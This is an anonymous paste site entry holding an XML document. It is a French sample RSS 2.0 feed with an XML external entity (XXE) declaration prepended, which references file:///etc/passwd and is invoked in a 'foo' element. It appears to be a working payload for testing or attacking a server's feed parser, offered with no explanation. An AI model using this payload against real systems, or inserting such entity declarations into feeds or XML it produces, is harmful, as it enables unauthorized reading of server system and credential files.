Advertisement
Guest User

Untitled

a guest
Oct 21st, 2014
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
  3. <foo>&xxe;</foo>
  4. <rss version="2.0">
  5. <channel>
  6. <title>Mon site</title>
  7. <description>Ceci est un exemple de flux RSS 2.0</description>
  8. <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
  9. <link>http://www.example.org</link>
  10. <item>
  11. <title>prout</title>
  12. <description>Ceci est ma première actualité</description>
  13. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  14. <link>http://www.example.org/actu1</link>
  15. </item>
  16. <item>
  17. <title>Actualité N°2</title>
  18. <description>Ceci est ma seconde actualité</description>
  19. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  20. <link>http://www.example.org/actu2</link>
  21. </item>
  22. </channel>
  23. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement